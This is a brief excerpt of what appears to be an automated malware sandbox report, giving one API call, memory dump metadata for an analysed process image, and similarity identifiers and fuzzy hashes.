                                                                                          • SetLastError.KERNEL32(0000007E,00410955), ref: 004106F6
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorLastRead
                                                                                          • String ID:
                                                                                          • API String ID: 4100373531-0
                                                                                          • Opcode ID: 9879e5f97f9034714067de51e7f9b75c8f83f84791738768acf52853c1cf03dd
                                                                                          • Instruction ID: 0e21605053d2ba8273329305491efaf700724209343246308e891da9604144dc
                                                                                          • Opcode Fuzzy Hash: 9879e5f97f9034714067de51e7f9b75c8f83f84791738768acf52853c1cf03dd
                                                                                          • Instruction Fuzzy Hash: 73417C71644305DFE7208F18DC84BA7B7E4FF88714F00442EE54687691EBB5E8A5CB19